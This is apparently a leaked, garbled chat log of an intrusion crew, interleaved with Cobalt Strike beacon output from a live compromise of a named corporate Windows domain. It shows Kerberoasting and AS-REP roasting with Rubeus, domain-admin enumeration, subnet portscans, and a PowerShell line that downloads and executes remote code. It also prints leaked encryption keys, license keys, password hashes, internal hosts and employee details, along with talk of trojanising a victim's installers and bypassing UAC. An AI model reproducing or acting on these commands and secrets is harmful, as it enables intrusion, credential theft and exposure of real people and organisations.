CVE-2019-1130 : VULNERABLE [>] https://github.com/S3cur3Th1sSh1t/SharpByeBear [!] CVE-2019-1253 : VULNERABLE [>] https://github.com/padovah4ck/CVE-2019-1253 [!] CVE-2019-1315 : VULNERABLE [>] https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html [!] CVE-2019-1385 : VULNERABLE [>] https://www.youtube.com/watch?v=K6gHnr-VkAg [!] CVE-2019-1388 : VULNERABLE [>] https://github.com/jas502n/CVE-2019-1388 [!] CVE-2019-1405 : VULNERABLE [>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/ [>] https://github.com/apt69/COMahawk ``Why don't you raise the context?)``caption is not raised? dk? specifically adfindthere is no point in hiding, because the running software is legitimatejust `shell adfind.bat``why do you use powerpik to work with exe launching?tl2user2+user7 I will add and you can do spidran)will do tomorrow, for now just a list of users here on work with this session before tomorrow + In all green sent @close and delete files if there were do not forget to close sessionsTesting this script pack https://github.com/S3cur3Th1sSh1t/Creds/tree/master/PowershellScripts then change the script `The term 'CheckIfWindowsIsCore' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. C:Windows\System32\WindowsPowerShell\v1.0 BBCTX6 @ MAPCIASP\bbbwalkerj SetkRegSmbv3Compression -value 1 The term 'SetkRegSmbv3Compression' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. 
00:00.0064 C:{Windows\System32\WindowsPowerShell\v1.0 BBCTX6 @ MAPCIASP\bbbwalkerj CVE-2020-0796-Smbv3-checker.ps1 SetkRegSmbv3Compression -value 1 The term 'CVE-2020-0796-Smbv3-checker.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. 00:00.0044 ``It doesn't work taki tSetkRegSmbv3Compression -value 1``` SetkRegSmbv3Compression -value 0 ``that kind of thing''. Do { Get-Menu $input = Read-Host "Please make a selection" switch ($input) { '1' { Write-Host 'You chose option #1' CheckRegSmbv3Compression } '2' { Write-Host 'You chose option #2' SetkRegSmbv3Compression -value 1 } '3' { Write-Host 'You chose option #3' SetkRegSmbv3Compression -value 0 } 'Q' { return } } pause } `````` C:\Windows\System32\WindowsPowerShell\v1.0 BBCTX6 @ MAPCIASP\bbbwalkerj CVE-2020-0796-Smbv3-checker.ps1 The term 'CVE-2020-0796-Smbv3-checker.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. 00:00.0080 C:{Windows\System32\WindowsPowerShell\v1.0 BBCTX6 @ MAPCIASP\bbbwalkerj CVE-2020-0796 The term 'CVE-2020-0796' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. 00:00.0045 C:{Windows\System32\WindowsPowerShell\v1.0 BBCTX6 @ MAPCIASP\bbbwalkerj CVE-2020-0796-Smbv3-checker The term 'CVE-2020-0796-Smbv3-checker' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. 
00:00.0057 C:{Windows\System32\WindowsPowerShell\v1.0 BBCTX6 @ MAPCIASP\bbbwalkerj iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/T13nn3s/CVE-2020-0796/master/CVE-2020-0796-Smbv3-checker.ps1')); C:{Windows\System32\WindowsPowerShell\v1.0 BBCTX6 @ MAPCIASP\bbbwalkerj CVE-2020-0796-Smbv3-checker The term 'CVE-2020-0796-Smbv3-checker' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. 00:00.0048 C:{Windows\System32\WindowsPowerShell\v1.0 BBCTX6 @ MAPCIASP\bbbwalkerj CVE-2020-0796-Smbv3-checker.ps1 The term 'CVE-2020-0796-Smbv3-checker.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. 00:00.0044 C:{Windows\System32\WindowsPowerShell\v1.0 BBCTX6 @ MAPCIASP\bbbwalkerj .\CVE-2020-0796-Smbv3-checker.ps1 The term '.\CVE-2020-0796-Smbv3-checker.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. 00:00.0058 C:{Windows\System32\WindowsPowerShell\v1.0 BBCTX6 @ MAPCIASP\bbbwalkerj ./CVE-2020-0796-Smbv3-checker.ps1 The term './CVE-2020-0796-Smbv3-checker.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. 00:00.0030 ``Isn't the session dead after importing? iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/T13nn3s/CVE-2020-0796/master/CVE-2020-0796-Smbv3-checker.ps1')); `` How do I apply it? 
So CVE-2020-0796-Smbv3-checker.ps1 and so CVE-2020-0796-Smbv3-checker doesn't work. Help another command while sessions Lёh, here's up to 150ZT-0314jesh-6396 `` File exceeds allowed size of 100 MB. [error-file-too-large] ``would it be better to download it here as an archive or as a file? ad_users downloaded yes, endpoint((*with a password, if there is an endpoint, then only disable it in the password@tl1 and kasper can shut it up for a while?i hope you'll be able to download it in a few minutes........then i looked at the size.....first i told you to download it......i'm smart......i hope you'll be able to download it.......how much do you think it'll weigh? [X] KRB-ERROR (23) : KDC_ERR_KEY_EXPIRED `````` [X] No users found to Kerberoast! ``Both of the hash types try to take the rube off``. beacon> shell net group "enterprise admins" /dom [*] Tasked beacon to run: net group "enterprise admins" /dom [+] host called home, sent: 65 bytes [+] received output: The request will be processed at a domain controller for domain csez.zohocorpin.com. Group name Enterprise Admins Comment Designated administrators of the enterprise Members ------------------------------------------------------------------------------- Administrator pmpdemo rmp The command completed successfully. `````` beacon> shell net group "domain admins" /dom [*] Tasked beacon to run: net group "domain admins" /dom [+] host called home, sent: 61 bytes [+] received output: The request will be processed at a domain controller for domain csez.zohocorpin.com. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- Administrator adssp assetprober desktopcentral gjprabu-0985 kamal-0150 nocfw sysadmin sysaudit vijay-3486 zohoits The command completed successfully. ``The file is gone again. 
[*] Action: AS-REP roasting [*] Target Domain : csez.zohocorpin.com [*] Searching path 'LDAP://est-adc2.csez.zohocorpin.com/DC=csez,DC=zohocorpin,DC=com' for AS-REP roastable users [*] SamAccountName : gunas-0326 [*] DistinguishedName : CN=Gunaseelan Parthiban,OU=Windows Server Management,OU=ManageEngine,OU=Users,OU=All Users and Computers,DC=csez,DC=zohocorpin,DC=com [*] Using domain controller: est-adc2.csez.zohocorpin.com (192.168.100.93) [*] Building AS-REQ (w/o preauth) for: 'csez.zohocorpin.com\gunas-0326' [X] KRB-ERROR (23) : KDC_ERR_KEY_EXPIRED [*] Roasted hashes written to : C:\Users\raja-9298\EULA_as.txt ``Let's put it this way. execute-assembly /Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt ``Not even a blank and no output file, actually`` beacon> execute-assembly /home/user/Desktop/cobalt/Tools/Ghostpack-CompiledBinaries-master/Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\Users\raja-9298\EULA_ha.txt [*] Action: Kerberoasting [*] NOTICE: AES hashes will be returned for AES-enabled accounts. [*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts. [*] Searching the current domain for Kerberoastable users [X] No users found for Kerberoast! [*] Roasted hashes written to : C:\Users\raja-9298\EULA_ha.txt ``Did you do it?'' in #general and ``AdventNetLicense.xml 3 ``` ACNTRL="NO" CompanyName="International Systems Engineering" EmailID="t.basheer@ise.sa" ExpiryDate="2022-10-07" Key="nJbGSnDTGRbp9NS3GAPD9fRRpy7TAdPQdP3TuSKRlcPyGNT7KJQTQ1b7JpPVQaSnGRbp9TSzGQ1GyTSzJRP7eabTGRbGa1bTfN3GSnxnnPbp9nxndpX9SPlydP3uzlZdpQ71uDfZpJXu1bdfyQ3GbSpdpT7KbTSfVXGSPPy" LicenseType="Registered" Name="International Systems Engineering . 
5WUV0UZ10Wv4XdNj84XRvNvDbWZTVi1UenjdjenjmjYIvN8iNvviXNXmaiN8sNvY8L4YX4NjPkRXGNjYvoX8QXRAs8GKXokR4NKjYLXvvNvrvHk4RvsKvsNvY8LXsIvs8aRvvCsXQI44YX4NjPkRXm8RpWZ5VW11djvsNvY8lWV10U111UW0V1djRvmj4sKPsL8X4vdvsNvY8l5WskvzFORvQmKn0v4XdLX8Rtskvz0skvzLX8RtFOjnRviXNXmkvz01N8mGXvsLXFpMpGv98LXYjlsRvswvs8RHRv4NgRviXNXMGRjvssXp0I0IT28RtssXpsLXR4NvPvRKYvodjdj ````AdventNetLicense.xml 2 `` ``` ACNTRL="NO" CompanyName="International Systems Engineering" EmailID="t.basheer@ise.sa" ExpiryDate="2022-10-07" Key="nJbGSnDTGRbp9NS3GAPD9fRRpy7TAdPQdP3TuSKRlcPyGNT7KJQTQ1b7JpPVQaSnGRbp9TSzGQ1GyTSzJRP7eabTGRbGa1bTfN3GSnxnnPbp9nxndpX9SPlydPP3uzlZdpQ71uDfZpJXu1bdfyQ3GbSpdpT7KbTSfVXGSPPy" LicenseType="Registered" Name="International Systems Engineering . 5WUV0UZ10Wv4XdNj84XRvNvDbWZTVi1UenjdjenjmjYIvN8iNvviXNXmaiN8sNvY8L4YX4NjPkRXGNjYvoX8QXRAs8GKXokR4NKjYLXvvNvrvHk4RvsKvsNvY8LXsIvs8aRvvCsXQI44YX4NjPkRXm8RpWZ5VW11djvsNvY8lWV10U111UW0V1djRvmj4sKPsL8X4vdvsNvY8l5WskvzFORvQmKn0v4XdLX8Rtskvz0skvzLX8RtFOjnRviXNXmkvz01N8mGXvsLXFpMpGv98LXYjlsRvswvs8RHRv4NgRviXNXMGRjvssXp0I0IT28RtssXpsLXR4NvPvRKYvodjdj ````AdventNetLicense.xml 1` ``` ACNTRL="NO" CompanyName="Mizuho Information Research Institute Inc" EmailID="satoru.mochida@mizuho-ir.co.jp" Key="nJbGSnDTGRbp9NS3dP3XG7cydJJ97SlddJfyGnx3lcQ7ancPJdc7yVJzKJ9VSaSJJ99ancPJdc7y1bJKPDGyTdlAaDQaSnndPX9NTTnPfp97KDndV911Py3Aa97dD7ndV917K9u9P9yyPQbDufSJuyzTfzlp" LicenseType="Registered" Name="ADJ20S6024EI1" . 10Ui0U1W0WkR8H2goMATWU60U0W0Wv4XdNj84XRvNvDbTEVTEWUenjdjenjmjYIHRjYjCj9avsNvY8LUHJ4YX4NjPkRXGNjYvoLLKNkR4NKjYGvRv4s8ivrvHk4RvsKvsNvY8LHJIjYIR8UjCK98maXG8CYjmIKRj4Xs4YX4NjPkRXm8RpiV61100000VdjvsNvY8lETE0U111U5001djRvmj4sKPsL8X4vdvsNvY8l5WskvzFORvQmKn0v4XdLX8Rtskvz0skvzLX8RtFOjnRviXNXmkvz5N8mGXvKR4pMpGv98LXYjlsRvswvs8RHRv4NgRviXNXMGRjvssXp0I0IT28RtssXpsLXR4NvPvRKYvodjdj . ``Another file ``pmp_key.key ``` #This file contains the master AES encryption key for this installation, automatically generated by Password Manager Pro. 
#The default location of this file is conf and it is not secure to leave this file here, unless #the server is sufficiently hardened to protect any illegal access of this file. #It is highly recommended to move this file out of its default location and for instructions to securely store this file refer. #Thu Jul 23 12:13:08 IST 2020 ENCRYPTIONKEY=HCUqmg5JnLRACWluto4JNAM/hevFIhFhZuxfXlFumHc\= ``` ```ENCRYPTIONKEY=HCUqmg5JnLRACWluto4JNAM/hevFIhFhZuxfXlFumHc=``[*] Tasked beacon to run .NET program: SharpRoast.exe all [+] host called home, sent: 120881 bytes [+] received output: SamAccountName : certsrv DistinguishedName : CN=certsrv,CN=Users,DC=csez,DC=zohocorpin,DC=com ServicePrincipalName : http/its-winca.csez.zohocorpin.com Hash : $krb5tgs$18$$*$csez.zohocorpin.com$http/its-winca.csez.zohocorpin.com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ashes have been saved at: /tmp/hashes-kerberoasting.txt [*] Hashes have been saved at: /tmp/hashes-kerberoasting.txt where is the info below? noThis is full[ ](https://mediaeveryone.com/group/zohocorpin-com?msg=yatwv5agaaG3kamLj) full hash here please`c.pwd ``` encryption: CRYPT_32 isAutoGenerated: true value: !binary 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 ``[ ](https://mediaeveryone.com/group/zohocorpin-com?msg=7QWLSvMpoZJ3ApgQf) UserName=admin OrgAgentKey=7ibHlt21yiwithin this there is an av that is fighting against such methodspon fact need to pull the file, glue it to the load and load it back Sure, but it is not very simple and quite strange@tl1 can we somehow take from his desktop file msi or exe add to it our load and force him to run? It's just that he has installers on his desktop and the same anydesk, which he probably runs without installing...`pmp_key.key ``` #This file contains the master AES encryption key for this installation, automatically generated by Password Manager Pro. 
#The default location of this file is conf and it is not secure to leave this file here, unless #the server is sufficiently hardened to protect any illegal access of this file. #It is highly recommended to move this file out of its default location and for instructions to securely store this file refer. #OLDENCRYPTIONKEY=9COBmS4sjljyY8ii1pn9Z2g+CkNUf+qTwR4LvQkVYFA= #Tue Dec 10 20:22:53 IST 2019 ENCRYPTIONKEY=5qRvsVKpPFdB6RnZQI89p6PUYWT6Oki1gHGgZWgRID0= ``` `OLDENCRYPTIONKEY=9COBmS4sjljjyY8ii1pn9Z2g+CkNUf+qTwR4LvQkVYFA=` ``ENCRYPTIONKEY=5qRvsVKpFdB6RnZI89p6PUYWT6Oki1gHGgZWgRID0\=``ShareFinder ``` \trm-compliance.csez.zohocorpin.com\DC_Deployment - \trm-compliance.csez.zohocorpin.com\F - \trm-compliance.csez.zohocorpin.com\Venu-5860 - \DC-SOFTWARE.csez.zohocorpin.com\iso - \DC-SOFTWARE.csez.zohocorpin.com\print$ - Printer Drivers \\DC-SOFTWARE.csez.zohocorpin.com\u16 - \DC-SOFTWARE.csez.zohocorpin.com\Users - \print-server-bkp.csez.zohocorpin.com\Coolpay-Server$ - \print-server-bkp.csez.zohocorpin.com\D - \print-server-bkp.csez.zohocorpin.com\print$ - Printer Drivers \print-server-bkp.csez.zohocorpin.com\Users - \est-desktopcentral.csez.zohocorpin.com\DC Backups - \est-desktopcentral.csez.zohocorpin.com\DC_share - \est-desktopcentral.csez.zohocorpin.com\logs - \est-desktopcentral.csez.zohocorpin.com\pg_log - \est-desktopcentral.csez.zohocorpin.com\ScheduledDBBackup - \est-desktopcentral.csez.zohocorpin.com\webapps - \EST-ADC2.csez.zohocorpin.com/NETLOGON - Logon server share \EST-ADC2.csez.zohocorpin.com\SYSVOL - Logon server share ``` Also looking forcsez.zohocorpin.comip DC `192.168.100.61```` SamAccountName : certsrv DistinguishedName : CN=certsrv,CN=Users,DC=csez,DC=zohocorpin,DC=com ServicePrincipalName : http/its-winca.csez.zohocorpin.com Hash : $krb5tgs$18$$*$csez.zohocorpin.com$http/its-winca.csez.zohocorpin.com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````beacon> portscan 10.59.8.0/24 23,22,80,1433,135,445,3389,5900` ``` 10.59.8.233:80 
10.59.8.223:80 10.59.8.221:80 10.59.8.217:80 10.59.8.213:80 10.59.8.210:80 10.59.8.201:80 10.59.8.204:80 10.59.8.99:80 10.59.8.193:80 10.59.8.188:80 10.59.8.180:80 10.59.8.175:80 10.59.8.167:80 10.59.8.165:80 10.59.8.164:80 10.59.8.160:80 10.59.8.117:80 10.59.8.133:80 10.59.8.132:80 10.59.8.122:80 10.59.8.120:80 10.59.8.103:80 10.59.8.243:80 10.59.8.232:80 10.59.8.147:80 10.59.8.106:80 10.59.8.55:80 10.59.8.112:80 10.59.8.107:80 10.59.8.104:80 10.59.8.98:80 10.59.8.102:80 10.59.8.97:80 10.59.8.88:80 10.59.8.86:80 10.59.8.85:80 10.59.8.84:80 10.59.8.81:80 10.59.8.67:80 10.59.8.61:80 10.59.8.53:80 10.59.8.49:80 10.59.8.41:80 10.59.8.48:80 10.59.8.40:80 10.59.8.34:80 10.59.8.5:80 10.59.8.28:80 10.59.8.19:80 10.59.8.12:80 10.59.8.9:80 ``` ``Scanner module is complete```` beacon> shell net group "domain admins" /dom [*] Tasked beacon to run: net group "domain admins" /dom [+] host called home, sent: 61 bytes [+] received output: The request will be processed at a domain controller for domain csez.zohocorpin.com. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- Administrator adssp assetprober desktopcentral gjprabu-0985 kamal-0150 nocfw sysadmin sysaudit vijay-3486 zohoits The command completed successfully. 
``10.59.9.180 ping more``beacon> portscan 192.168.237.0/24 23,22,80,1433,135,445,3389,5900 ``` 192.168.237.248:3389 192.168.237.248:1433 192.168.237.248:135 192.168.237.248:80 192.168.237.239:5900 192.168.237.231:80 192.168.237.231:23 192.168.237.216:3389 192.168.237.203:80 192.168.237.196:80 192.168.237.196:23 192.168.237.187:3389 192.168.237.187:135 192.168.237.187:80 192.168.237.248:22 (SSH-2.0-WeOnlyDo-wodFTPD 3.3.0.424) 192.168.237.231:22 (SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8) 192.168.237.216:22 (SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3) 192.168.237.203:22 (SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.13) 192.168.237.196:22 (SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.6) 192.168.237.179:22 (SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8) 192.168.237.203:23 192.168.237.239:22 (SSH-2.0-OpenSSH_7.6) 192.168.237.187:22 (SSH-2.0-6.4.18.407 SSH Tectia Server) 192.168.237.179:445 (platform: 500 version: 6.1 name: ZLABS-VR-1 domain: WORKGROUP) 192.168.237.187:445 192.168.237.239:445 192.168.237.248:445 ``` ``Scanner module is complete```` [*] OS Build Number: 18363 [*] Enumerating installed KBs... 4576484 4517245 4560959 4561600 4565554 4569073 4576751 4576754 4574727 [!] CVE-2019-1385 : VULNERABLE [>] https://www.youtube.com/watch?v=K6gHnr-VkAg [!] CVE-2019-1405 : VULNERABLE [>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/ [>] https://github.com/apt69/COMahawk [*] Finished. Found 2 potential vulnerabilities. ``portscan 172.24.148.0/24-OS undefined? 
``` 172.21.182.237:5985 172.21.182.237:636 172.21.182.237:593 172.21.182.237:464 172.21.182.237:389 172.21.182.238:22 (SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8) 172.21.182.237:5985 172.21.182.237:636 172.21.182.237:593 172.21.182.237:464 172.21.182.237:389 172.21.182.238:22 (SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8) 172.21.182.237:139 172.21.182.237:135 172.21.182.237:88 172.21.182.237:53 172.21.182.227:5985 172.21.182.227:3389 172.21.182.227:636 172.21.182.227:593 172.21.182.227:464 172.21.182.227:389 172.21.182.227:139 172.21.182.227:135 172.21.182.227:88 172.21.182.227:80 172.21.182.227:53 172.21.182.108:3389 172.21.182.108:139 172.21.182.108:135 172.21.182.108:23 172.21.182.109:3389 172.21.182.109:139 172.21.182.109:135 172.21.182.63:5900 172.21.182.63:3389 172.21.182.63:139 172.21.182.63:135 172.21.182.60:3389 172.21.182.45:5985 172.21.182.45:3389 172.21.182.45:389 172.21.182.45:139 172.21.182.45:135 172.21.182.45:88 172.21.182.45:53 172.21.182.45:636 172.21.182.45:22 (SSH-2.0-OpenSSH_for_Windows_8.1) 172.21.182.8:600 172.21.182.8:443 172.21.182.8:135 172.21.182.8:80 172.21.182.8:22 (SSH-2.0-OpenSSH_4.3) 172.21.182.32:23 172.21.182.32:22 (SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3) 172.21.182.27:5900 172.21.182.27:88 172.21.182.27:22 (SSH-2.0-OpenSSH_7.9) 172.21.182.27:445 172.21.182.8:445 172.21.182.63:445 172.21.182.108:445 172.21.182.227:445 172.21.182.237:445 ``` ``Scanner module is complete`` took one by one not in parallel all 5 in /24 then in portscan /24 these sabnets and wrote without it without complete domain? 
Pinging PMP-2K8R2-DC1.csez.zohocorpin.com [172.21.182.45] with 32 bytes of data: Reply from 172.21.182.45: bytes=32 time=13ms TTL=126 Reply from 172.21.182.45: bytes=32 time=12ms TTL=126 Reply from 172.21.182.45: bytes=32 time=11ms TTL=126 Reply from 172.21.182.45: bytes=32 time=7ms TTL=126 Ping statistics for 172.21.182.45: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 7ms, Maximum = 13ms, Average = 10ms ``` ``` Pinging pmp-w7-jap.csez.zohocorpin.com [172.24.148.190] with 32 bytes of data: Reply from 172.24.148.190: bytes=32 time=26ms TTL=126 Reply from 172.24.148.190: bytes=32 time=9ms TTL=126 Reply from 172.24.148.190: bytes=32 time=8ms TTL=126 Reply from 172.24.148.190: bytes=32 time=7ms TTL=126 Ping statistics for 172.24.148.190: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 7ms, Maximum = 26ms, Average = 12ms ``` ``` Pinging pmp-win10-64-2.csez.zohocorpin.com [192.168.237.248] with 32 bytes of data: Reply from 192.168.237.248: bytes=32 time=12ms TTL=126 Reply from 192.168.237.248: bytes=32 time=8ms TTL=126 Reply from 192.168.237.248: bytes=32 time=8ms TTL=126 Reply from 192.168.237.248: bytes=32 time=8ms TTL=126 Ping statistics for 192.168.237.248: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 8ms, Maximum = 12ms, Average = 9ms ``` ``` Pinging pmp2k16.csez.zohocorpin.com [172.24.147.218] with 32 bytes of data: Reply from 172.24.147.218: bytes=32 time=23ms TTL=126 Reply from 172.24.147.218: bytes=32 time=9ms TTL=126 Reply from 172.24.147.218: bytes=32 time=9ms TTL=126 Reply from 172.24.147.218: bytes=32 time=9ms TTL=126 Ping statistics for 172.24.147.218: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 9ms, Maximum = 23ms, Average = 12ms ``` ``` Pinging ramanathan-0501.csez.zohocorpin.com [10.59.8.42] with 32 
bytes of data: Reply from 10.59.8.42: bytes=32 time=48ms TTL=63 Reply from 10.59.8.42: bytes=32 time=72ms TTL=63 Reply from 10.59.8.42: bytes=32 time=56ms TTL=63 Reply from 10.59.8.42: bytes=32 time=63ms TTL=63 Ping statistics for 10.59.8.42: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 48ms, Maximum = 72ms, Average = 59ms `````` [+] host called home, sent: 409 bytes [+] received output: Server: UnKnown Address: 192.168.100.30 _ldap._tcp.csez.zohocorpin.com SRV service location: priority = 0 weight = 100 port = 389 svr hostname = tsi-csez-adc.csez.zohocorpin.com _ldap._tcp.csez.zohocorpin.com SRV service location: priority = 0 weight = 100 port = 389 svr hostname = ruestadc.ru.zohocorpin.com _ldap._tcp.csez.zohocorpin.com SRV service location: priority = 0 weight = 100 port = 389 svr hostname = win2k12master.csez.zohocorpin.com _ldap._tcp.csez.zohocorpin.com SRV service location: priority = 0 weight = 100 port = 389 svr hostname = est-adc.csez.zohocorpin.com _ldap._tcp.csez.zohocorpin.com SRV service location: priority = 0 weight = 100 port = 389 svr hostname = est-adc2.csez.zohocorpin.com csez.zohocorpin.com nameserver = est-master-server.csez.zohocorpin.com csez.zohocorpin.com nameserver = est-dns-slave4.csez.zohocorpin.com csez.zohocorpin.com nameserver = proxy-server2.csez.zohocorpin.com csez.zohocorpin.com nameserver = proxy-server1.csez.zohocorpin.com csez.zohocorpin.com nameserver = est-dns-slave3.csez.zohocorpin.com csez.zohocorpin.com nameserver = est-dns-slave1.csez.zohocorpin.com csez.zohocorpin.com nameserver = est-dns-slave2.csez.zohocorpin.com 'nltest' is not recognized as an internal or external command, operable program or batch file. ``Ping them too``. 
pmp-2k8r2-dc1 pmp\administrator pmp-w7-jap pmp\administrator pmp-win10-64-2 pmp\administrator pmp2k16 administrator ramanathan-0501 ZOHOCORP\ramanathan-0501 `````` ====== RDPSavedConnections ====== Saved RDP Connection Information (S-1-5-21-1867688552-3649366528-3325780993-65238) RemoteHost UsernameHint ---------- ------------ pmp-2k8r2-dc1 pmp\administrator pmp-w7-jap pmp\administrator pmp-win10-64-2 pmp\administrator pmp2k16 administrator ramanathan-0501 ZOHOCORP\ramanathan-0501 ====== RDPSessions ====== SessionID : 0 SessionName : Services UserName : DomainName : State : Disconnected SourceIp : SessionID : 1 SessionName : Console UserName : raja-9298 DomainName : ZOHOCORP State : Active SourceIp : ``` ``` ====== LogonSessions ====== Logon Sessions (via WMI) UserName : raja-9298 Domain : ZOHOCORP LogonId : 34354149 LogonType : Interactive AuthenticationPackage : Kerberos StartTime : 13-09-2020 10:40:04 UserPrincipalName : UserName : raja-9298 Domain : ZOHOCORP LogonId : 34354119 LogonType : Interactive AuthenticationPackage : Kerberos StartTime : 13-09-2020 10:40:04 UserPrincipalName : ====== LSASettings ====== auditbasedirectories : 0 auditbaseobjects : 0 Bounds : 00-30-00-00-00-20-00-00 crashonauditfail : 0 fullprivilegeauditing : 00 LimitBlankPasswordUse : 1 NoLmHash : 1 Security Packages : "" Notification Packages : scecli Authentication Packages : msv1_0 disabledomaincreds : 0 everyoneincludesanonymous : 0 forceguest : 0 LsaCfgFlagsDefault : 0 LsaPid : 908 ProductType : 6 restrictanonymous : 1 restrictanonymoussam : 1 scenoapplylegacyauditpolicy : 1 SecureBoot : 1 usemachineid : 0 ``` ``` ====== LocalUsers ====== ComputerName : localhost UserName : Administrator Enabled : False Rid : 500 UserType : Administrator Comment : Built-in account for administering the computer/domain PwdLastSet : 01-01-1970 00:00:00 LastLogon : 28-05-2019 23:10:40 NumLogins : 5 ComputerName : localhost UserName : DefaultAccount Enabled : False Rid : 503 UserType : Guest Comment : A 
user account managed by the system. PwdLastSet : 01-01-1970 00:00:00 LastLogon : 01-01-1970 00:00:00 NumLogins : 0 ComputerName : localhost UserName : Guest Enabled : False Rid : 501 UserType : Guest Comment : Built-in account for guest access to the computer/domain PwdLastSet : 01-01-1970 00:00:00 LastLogon : 01-01-1970 00:00:00 NumLogins : 0 ComputerName : localhost UserName : sysadmin Enabled : True Rid : 1001 UserType : Administrator Comment : PwdLastSet : 19-06-2019 14:28:18 LastLogon : 15-08-2019 08:31:17 NumLogins : 31 ComputerName : localhost UserName : WDAGUtilityAccount Enabled : False Rid : 504 UserType : Guest Comment : A user account managed and used by the system for Windows Defender Application Guard scenarios. PwdLastSet : 28-05-2019 22:52:09 LastLogon : 01-01-1970 00:00:00 NumLogins : 0. ``ping CSEZ.ZOHOCORPIN.COM. beacon> execute-assembly /home/user/tools/Net-GPPPassword.exe [*] Tasked beacon to run .NET program: Net-GPPPassword.exe [+] host called home, sent: 114731 bytes [+] received output: Processing files in \CSEZ.ZOHOCORPIN.COM\sysvol\CSEZ.ZOHOCORPIN.COM\policies\ [+] received output: [-] Invoke_3 on EntryPoint failed. `````` beacon> shell net group "domain admins" /dom [*] Tasked beacon to run: net group "domain admins" /dom beacon> shell net group "enterprise admins" /dom [*] Tasked beacon to run: net group "enterprise admins" /dom [+] host called home, sent: 162 bytes [+] received output: The request will be processed at a domain controller for domain csez.zohocorpin.com. System error 5 has occurred. Access is denied. [+] received output: The request will be processed at a domain controller for domain csez.zohocorpin.com. System error 5 has occurred. Access is denied. ``Access is dead tried the shell net group "domain admins"/dom maybe also the VPN is not connected/`` AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 LDAP_BIND: [] Error 0x52 (82) - Local Error Terminating program. 
`````` ====== AntiVirus ====== Windows Defender Kaspersky Endpoint Security for Windows ``` ``` ====== DotNet ====== Installed CLR Versions 4.0.30319 Installed .NET Versions 4.8.03752 Anti-Malware Scan Interface (AMSI) OS supports AMSI : True .NET version supports AMSI : True [!] The highest .NET version is enrolled in AMSI! ``` ``` ====== NetworkShares ====== Name : ADMIN$ Path : C:\WINDOWS Description : Remote Admin Name : C$ Path : C:\ Description : Default share Name : D$ Path : D:\ Description : Default share Name : E$ Path : E:\ Description : Default share Name : IPC$ Path : Description : Remote IPC ``` ``` ====== OSInfo ====== Hostname : raja-9298 Domain Name : csez.zohocorpin.com Username : ZOHOCORP\raja-9298 ProductName : Windows 10 Pro EditionID : Professional ReleaseId : 1909 Build : 18363.1082 BuildBranch : 19h1_release CurrentMajorVersionNumber : 10 CurrentVersion : 6.3 Architecture : AMD64 ProcessorCount : 12 IsVirtualMachine : False BootTimeUtc (approx) : 12-09-2020 18:15:41 (Total uptime : 08:15:23:11) HighIntegrity : False IsLocalAdmin : True [*] In medium integrity but user is a local administrator - UAC can be bypassed. 
